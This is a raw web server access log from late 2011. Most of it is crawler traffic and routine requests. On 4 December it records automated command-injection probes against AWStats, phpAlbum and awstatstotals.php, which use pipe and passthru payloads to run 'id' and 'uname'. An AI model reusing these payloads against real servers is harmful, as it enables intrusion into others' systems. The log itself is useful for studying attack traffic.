124.115.11.187 - - [29/Nov/2011:04:36:29 +0100] "GET / HTTP/1.1" 200 373 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
124.115.1.66 - - [29/Nov/2011:04:47:22 +0100] "GET / HTTP/1.1" 200 373 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
66.249.72.185 - - [29/Nov/2011:05:49:39 +0100] "GET /robots.txt HTTP/1.1" 404 504 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.72.185 - - [29/Nov/2011:05:49:39 +0100] "GET / HTTP/1.1" 304 210 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.72.185 - - [29/Nov/2011:07:35:15 +0100] "GET /~gerard/bcrs/index.php?option=com_content&view=section&layout=blog&id=1&Itemid=3&limitstart=16 HTTP/1.1" 200 3379 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
208.80.194.35 - - [29/Nov/2011:10:03:24 +0100] "GET / HTTP/1.0" 200 291 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 3.1; .NET CLR 2.0.50727; ZangoToolbar 4.8.3; yplus 5.6.04b)"
123.125.71.79 - - [29/Nov/2011:10:04:13 +0100] "GET /robots.txt HTTP/1.1" 404 466 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
66.249.72.185 - - [29/Nov/2011:13:40:26 +0100] "GET /~gerard/bcrs/index.php?option=com_content&view=section&layout=blog&id=1&Itemid=3&limitstart=56 HTTP/1.1" 200 4010 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
123.125.71.102 - - [29/Nov/2011:13:45:04 +0100] "GET / HTTP/1.1" 200 335 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
66.249.72.185 - - [29/Nov/2011:18:47:43 +0100] "GET /robots.txt HTTP/1.1" 404 504 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.72.185 - - [29/Nov/2011:18:47:43 +0100] "GET /~gerard/bcrs/index.php?option=com_content&view=article&id=72&catid=12&Itemid=34 HTTP/1.1" 200 3437 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
124.115.11.187 - - [30/Nov/2011:03:29:56 +0100] "GET / HTTP/1.1" 200 373 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
124.115.10.193 - - [30/Nov/2011:03:38:39 +0100] "GET / HTTP/1.1" 200 373 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
124.115.1.61 - - [30/Nov/2011:03:55:59 +0100] "GET / HTTP/1.1" 200 373 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
124.115.1.66 - - [30/Nov/2011:04:32:52 +0100] "GET / HTTP/1.1" 200 373 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
124.115.1.62 - - [30/Nov/2011:04:47:58 +0100] "GET / HTTP/1.1" 200 373 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
123.125.71.107 - - [30/Nov/2011:10:41:22 +0100] "GET /robots.txt HTTP/1.1" 404 466 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
114.80.93.71 - - [30/Nov/2011:22:38:53 +0100] "GET / HTTP/1.1" 200 373 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
208.80.194.30 - - [01/Dec/2011:01:16:20 +0100] "GET / HTTP/1.0" 200 291 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Videotron; FunWebProducts; .NET CLR 1.1.4322)"
193.252.118.176 - - [01/Dec/2011:02:32:14 +0100] "GET / HTTP/1.1" 200 335 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (support.voilabot@orange-ftgroup.com)"
220.181.51.108 - - [01/Dec/2011:03:15:42 +0100] "GET / HTTP/1.1" 200 335 "-" "Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2"
124.115.10.193 - - [01/Dec/2011:03:39:46 +0100] "GET / HTTP/1.1" 200 373 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
124.115.1.66 - - [01/Dec/2011:04:16:47 +0100] "GET / HTTP/1.1" 200 373 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
124.115.11.187 - - [01/Dec/2011:04:38:09 +0100] "GET / HTTP/1.1" 200 373 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
124.115.1.61 - - [01/Dec/2011:04:38:51 +0100] "GET / HTTP/1.1" 200 373 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
124.115.1.62 - - [01/Dec/2011:04:52:49 +0100] "GET / HTTP/1.1" 200 373 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
123.125.71.25 - - [01/Dec/2011:05:32:14 +0100] "GET / HTTP/1.1" 200 291 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
220.181.108.78 - - [01/Dec/2011:05:32:47 +0100] "GET / HTTP/1.1" 200 291 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
123.125.71.72 - - [01/Dec/2011:09:56:50 +0100] "GET /robots.txt HTTP/1.1" 404 466 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
66.249.72.185 - - [01/Dec/2011:21:10:51 +0100] "GET /robots.txt HTTP/1.1" 404 504 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.72.185 - - [01/Dec/2011:21:10:51 +0100] "GET /~gin/djpics/annesavage2.jpg HTTP/1.1" 404 517 "-" "Googlebot-Image/1.0"
64.246.178.34 - - [01/Dec/2011:21:40:19 +0100] "GET /robots.txt HTTP/1.0" 404 491 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.13) Gecko/2009073022 Firefox/3.5.2 (.NET CLR 3.5.30729) SurveyBot/2.3 (DomainTools)"
64.246.178.34 - - [01/Dec/2011:21:40:20 +0100] "GET / HTTP/1.1" 200 335 "http://whois.domaintools.com/deinon.net" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.13) Gecko/2009073022 Firefox/3.5.2 (.NET CLR 3.5.30729) SurveyBot/2.3 (DomainTools)"
114.80.93.71 - - [01/Dec/2011:22:12:21 +0100] "GET / HTTP/1.1" 200 373 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
66.249.72.185 - - [02/Dec/2011:01:09:53 +0100] "GET /~gin/djpics/mybooth3.jpg HTTP/1.1" 404 517 "-" "Googlebot-Image/1.0"
77.222.128.221 - - [02/Dec/2011:02:29:07 +0100] "GET /robots.txt HTTP/1.1" 404 504 "-" "Mozilla/5.0 (compatible; aiHitBot/1.0; +http://www.aihit.com/)"
77.222.128.221 - - [02/Dec/2011:02:29:12 +0100] "GET / HTTP/1.1" 200 373 "-" "Mozilla/5.0 (compatible; aiHitBot/1.0; +http://www.aihit.com/)"
114.80.93.71 - - [02/Dec/2011:02:33:56 +0100] "GET / HTTP/1.1" 200 373 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
124.115.1.66 - - [02/Dec/2011:03:50:10 +0100] "GET / HTTP/1.1" 200 373 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
124.115.10.193 - - [02/Dec/2011:03:57:05 +0100] "GET / HTTP/1.1" 200 373 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
124.115.1.61 - - [02/Dec/2011:04:18:27 +0100] "GET / HTTP/1.1" 200 373 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
124.115.1.62 - - [02/Dec/2011:04:27:12 +0100] "GET / HTTP/1.1" 200 373 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
124.115.11.187 - - [02/Dec/2011:04:35:39 +0100] "GET / HTTP/1.1" 200 373 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
123.125.71.114 - - [02/Dec/2011:05:02:26 +0100] "GET / HTTP/1.1" 200 335 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
66.249.72.185 - - [02/Dec/2011:05:09:53 +0100] "GET /~gin/djpics/mybooth1.jpg HTTP/1.1" 404 517 "-" "Googlebot-Image/1.0"
77.75.77.11 - - [02/Dec/2011:06:17:21 +0100] "GET /robots.txt HTTP/1.1" 404 504 "-" "SeznamBot/3.0 (+http://fulltext.sblog.cz/)"
77.75.77.11 - - [02/Dec/2011:06:17:21 +0100] "GET / HTTP/1.1" 200 372 "-" "SeznamBot/3.0 (+http://fulltext.sblog.cz/)"
208.80.194.30 - - [02/Dec/2011:08:48:23 +0100] "GET / HTTP/1.0" 200 291 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; YPC 3.2.0; FunWebProducts; .NET CLR 1.1.4322; .NET CLR 2.0.50727; IEMB3; IEMB3)"
66.249.72.185 - - [02/Dec/2011:09:09:53 +0100] "GET /~gin/djpics/annesavage0.jpg HTTP/1.1" 404 518 "-" "Googlebot-Image/1.0"
66.249.72.185 - - [02/Dec/2011:13:09:54 +0100] "GET /robots.txt HTTP/1.1" 404 504 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.72.185 - - [02/Dec/2011:13:09:54 +0100] "GET /~gin/djpics/djrap0.jpg HTTP/1.1" 404 514 "-" "Googlebot-Image/1.0"
69.58.178.56 - - [02/Dec/2011:13:30:36 +0100] "GET /robots.txt HTTP/1.1" 404 472 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.3; ips-agent) Gecko/20090824 Fedora/1.0.7-1.1.fc4 Firefox/3.5.3"
69.58.178.56 - - [02/Dec/2011:13:30:38 +0100] "GET / HTTP/1.1" 200 298 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.3; ips-agent) Gecko/20090824 Fedora/1.0.7-1.1.fc4 Firefox/3.5.3"
123.125.71.78 - - [02/Dec/2011:15:29:03 +0100] "GET /robots.txt HTTP/1.1" 404 466 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
31.47.37.50 - - [02/Dec/2011:18:20:48 +0100] "GET /torrentflux/downloads/chanti/The%20Matrix%20Trilogy/The.Matrix.Revolutions-2004%20DVDRip.Xvid.avi HTTP/1.0" 404 610 "http://www.deinon.net/torrentflux/downloads/chanti/The%20Matrix%20Trilogy" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
31.47.37.50 - - [02/Dec/2011:18:44:18 +0100] "GET /torrentflux/downloads/chanti/The%20Matrix%20Trilogy/The.Matrix.Revolutions-2004%20DVDRip.Xvid.avi HTTP/1.0" 404 610 "http://www.deinon.net/torrentflux/downloads/chanti/The%20Matrix%20Trilogy" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
66.249.72.185 - - [02/Dec/2011:19:27:16 +0100] "GET /robots.txt HTTP/1.1" 404 504 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.72.185 - - [02/Dec/2011:19:27:16 +0100] "GET /~gin/djpics/mybooth1.jpg HTTP/1.1" 404 516 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
31.47.37.50 - - [02/Dec/2011:19:36:41 +0100] "GET /torrentflux/downloads/chanti/The%20Matrix%20Trilogy/The.Matrix.Revolutions-2004%20DVDRip.Xvid.avi HTTP/1.0" 404 610 "http://www.deinon.net/torrentflux/downloads/chanti/The%20Matrix%20Trilogy" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
31.47.37.50 - - [02/Dec/2011:21:41:53 +0100] "GET /torrentflux/downloads/chanti/The%20Matrix%20Trilogy/The.Matrix.Revolutions-2004%20DVDRip.Xvid.avi HTTP/1.0" 404 610 "http://www.deinon.net/torrentflux/downloads/chanti/The%20Matrix%20Trilogy" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
124.115.1.61 - - [03/Dec/2011:03:09:07 +0100] "GET / HTTP/1.1" 200 373 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
124.115.10.193 - - [03/Dec/2011:03:17:48 +0100] "GET / HTTP/1.1" 200 373 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
124.115.1.66 - - [03/Dec/2011:03:20:29 +0100] "GET / HTTP/1.1" 200 373 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
124.115.11.187 - - [03/Dec/2011:03:24:14 +0100] "GET / HTTP/1.1" 200 373 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
124.115.1.62 - - [03/Dec/2011:03:30:54 +0100] "GET / HTTP/1.1" 200 373 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
66.249.72.185 - - [03/Dec/2011:08:35:21 +0100] "GET /robots.txt HTTP/1.1" 404 504 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.72.185 - - [03/Dec/2011:08:35:21 +0100] "GET /~gerard/bcrs/index.php?option=com_content&view=article&id=98&catid=13&Itemid=34 HTTP/1.1" 200 3103 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
31.47.37.50 - - [03/Dec/2011:11:19:03 +0100] "GET /torrentflux/downloads/chanti/The%20Matrix%20Trilogy/The.Matrix.Revolutions-2004%20DVDRip.Xvid.avi HTTP/1.0" 404 610 "http://www.deinon.net/torrentflux/downloads/chanti/The%20Matrix%20Trilogy" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
66.226.72.148 - - [03/Dec/2011:17:05:40 +0100] "GET / HTTP/1.1" 200 335 "-" "Mozilla/5.0 (Windows NT 6.1; rv:7.0.1) Gecko/20100101 Firefox/7.0.1"
208.80.194.29 - - [03/Dec/2011:17:48:03 +0100] "GET / HTTP/1.0" 200 291 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; iebar; acc=Messenger; acc=none)"
65.52.110.30 - - [03/Dec/2011:18:30:47 +0100] "GET /robots.txt HTTP/1.1" 404 529 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
65.52.110.30 - - [03/Dec/2011:18:31:35 +0100] "GET / HTTP/1.1" 304 211 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.204.213 - - [03/Dec/2011:19:33:07 +0100] "GET / HTTP/1.1" 200 316 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko)"
193.252.118.176 - - [04/Dec/2011:00:25:43 +0100] "GET /robots.txt HTTP/1.1" 404 466 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (support.voilabot@orange-ftgroup.com)"
193.252.118.176 - - [04/Dec/2011:00:25:51 +0100] "GET / HTTP/1.1" 200 335 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (support.voilabot@orange-ftgroup.com)"
124.115.1.61 - - [04/Dec/2011:02:50:33 +0100] "GET / HTTP/1.1" 200 373 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
124.115.11.187 - - [04/Dec/2011:02:56:26 +0100] "GET / HTTP/1.1" 200 373 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
124.115.10.193 - - [04/Dec/2011:03:00:28 +0100] "GET / HTTP/1.1" 200 373 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
124.115.1.66 - - [04/Dec/2011:03:16:58 +0100] "GET / HTTP/1.1" 200 373 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
124.115.1.62 - - [04/Dec/2011:03:20:38 +0100] "GET / HTTP/1.1" 200 373 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
121.166.70.252 - - [04/Dec/2011:04:51:25 +0100] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.1" 404 505 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
121.166.70.252 - - [04/Dec/2011:04:51:25 +0100] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;;echo%20YYY;echo| HTTP/1.1" 404 509 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
121.166.70.252 - - [04/Dec/2011:04:51:25 +0100] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.1" 404 511 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
121.166.70.252 - - [04/Dec/2011:04:51:26 +0100] "GET /cgi-bin/stats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.1" 404 511 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
121.166.70.252 - - [04/Dec/2011:04:51:26 +0100] "GET /cgi/awstats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.1" 404 507 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
121.166.70.252 - - [04/Dec/2011:04:51:26 +0100] "GET /scgi-bin/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.1" 404 510 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
121.166.70.252 - - [04/Dec/2011:04:51:27 +0100] "GET /scgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.1" 404 511 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
121.166.70.252 - - [04/Dec/2011:04:51:27 +0100] "GET /scgi-bin/stats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.1" 404 511 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
121.166.70.252 - - [04/Dec/2011:04:51:27 +0100] "GET /scgi/awstats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.1" 404 508 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
121.166.70.252 - - [04/Dec/2011:04:51:27 +0100] "GET /scripts/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.1" 404 508 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
121.166.70.252 - - [04/Dec/2011:04:51:28 +0100] "GET /stats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.1" 404 505 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
121.166.70.252 - - [04/Dec/2011:04:51:28 +0100] "GET /apps/phpAlbum/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27; HTTP/1.1" 404 511 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
121.166.70.252 - - [04/Dec/2011:04:51:28 +0100] "GET /phpAlbum/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27; HTTP/1.1" 404 508 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
121.166.70.252 - - [04/Dec/2011:04:51:29 +0100] "GET /main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27; HTTP/1.1" 404 501 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
121.166.70.252 - - [04/Dec/2011:04:51:29 +0100] "GET /phpalbum/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27; HTTP/1.1" 404 507 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
121.166.70.252 - - [04/Dec/2011:04:51:29 +0100] "GET /apps/phpalbum/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27; HTTP/1.1" 404 510 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
121.166.70.252 - - [04/Dec/2011:04:51:30 +0100] "GET /awstatstotals.php?sort=%7b%24%7bpassthru%28chr(105)%2echr(100)%29%7d%7d%7b%24%7bexit%28%29%7d%7d HTTP/1.1" 404 507 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
121.166.70.252 - - [04/Dec/2011:04:51:30 +0100] "GET /awstats/awstatstotals.php?sort=%7b%24%7bpassthru%28chr(105)%2echr(100)%29%7d%7d%7b%24%7bexit%28%29%7d%7d HTTP/1.1" 404 509 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
121.166.70.252 - - [04/Dec/2011:04:51:30 +0100] "GET /stat/awstatstotals.php?sort=%7b%24%7bpassthru%28chr(105)%2echr(100)%29%7d%7d%7b%24%7bexit%28%29%7d%7d HTTP/1.1" 404 509 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
121.166.70.252 - - [04/Dec/2011:04:51:31 +0100] "GET /awstatstotals/awstatstotals.php?sort=%7b%24%7bpassthru%28chr(105)%2echr(100)%29%7d%7d%7b%24%7bexit%28%29%7d%7d HTTP/1.1" 404 508 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
173.192.34.95 - - [04/Dec/2011:05:53:45 +0100] "GET /robots.txt HTTP/1.1" 404 529 "-" "Aboundex/0.2 (http://www.aboundex.com/crawler/)"
173.192.34.95 - - [04/Dec/2011:05:53:45 +0100] "GET / HTTP/1.1" 200 328 "-" "Aboundex/0.2 (http://www.aboundex.com/crawler/)"
46.4.100.138 - - [04/Dec/2011:06:20:25 +0100] "GET /robots.txt HTTP/1.1" 404 504 "http://deinon.net/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; de; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15"
46.4.100.138 - - [04/Dec/2011:06:20:25 +0100] "GET / HTTP/1.1" 200 373 "http://deinon.net/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; de; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15"
97.107.142.224 - - [04/Dec/2011:08:55:20 +0100] "GET / HTTP/1.0" 200 291 "-" "-"
31.47.37.50 - - [04/Dec/2011:10:10:01 +0100] "GET /torrentflux/downloads/chanti/The%20Matrix%20Trilogy/The.Matrix.Revolutions-2004%20DVDRip.Xvid.avi HTTP/1.0" 404 610 "http://www.deinon.net/torrentflux/downloads/chanti/The%20Matrix%20Trilogy" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
31.47.37.50 - - [04/Dec/2011:10:20:59 +0100] "GET /torrentflux/downloads/chanti/The%20Matrix%20Trilogy/The.Matrix.Revolutions-2004%20DVDRip.Xvid.avi HTTP/1.0" 404 610 "http://www.deinon.net/torrentflux/downloads/chanti/The%20Matrix%20Trilogy" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
66.249.72.185 - - [04/Dec/2011:12:29:05 +0100] "GET /robots.txt HTTP/1.1" 404 504 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.72.185 - - [04/Dec/2011:12:29:05 +0100] "GET /~gerard/bcrs/index.php?option=com_content&view=article&id=72&catid=12&Itemid=34 HTTP/1.1" 200 3437 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
80.248.214.103 - - [04/Dec/2011:12:40:01 +0100] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.1" 404 505 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
80.248.214.103 - - [04/Dec/2011:12:40:01 +0100] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;;echo%20YYY;echo| HTTP/1.1" 404 509 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
80.248.214.103 - - [04/Dec/2011:12:40:01 +0100] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.1" 404 511 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
80.248.214.103 - - [04/Dec/2011:12:40:01 +0100] "GET /cgi-bin/stats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.1" 404 511 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
80.248.214.103 - - [04/Dec/2011:12:40:01 +0100] "GET /cgi/awstats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.1" 404 507 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
80.248.214.103 - - [04/Dec/2011:12:40:01 +0100] "GET /scgi-bin/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.1" 404 510 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
80.248.214.103 - - [04/Dec/2011:12:40:01 +0100] "GET /scgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.1" 404 511 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
80.248.214.103 - - [04/Dec/2011:12:40:01 +0100] "GET /scgi-bin/stats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.1" 404 511 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
80.248.214.103 - - [04/Dec/2011:12:40:01 +0100] "GET /scgi/awstats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.1" 404 508 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
80.248.214.103 - - [04/Dec/2011:12:40:01 +0100] "GET /scripts/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.1" 404 508 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
80.248.214.103 - - [04/Dec/2011:12:40:01 +0100] "GET /stats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.1" 404 505 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
80.248.214.103 - - [04/Dec/2011:12:40:01 +0100] "GET /apps/phpAlbum/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27; HTTP/1.1" 404 511 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
80.248.214.103 - - [04/Dec/2011:12:40:01 +0100] "GET /phpAlbum/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27; HTTP/1.1" 404 508 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
80.248.214.103 - - [04/Dec/2011:12:40:01 +0100] "GET /main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27; HTTP/1.1" 404 501 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
80.248.214.103 - - [04/Dec/2011:12:40:01 +0100] "GET /phpalbum/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27; HTTP/1.1" 404 507 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
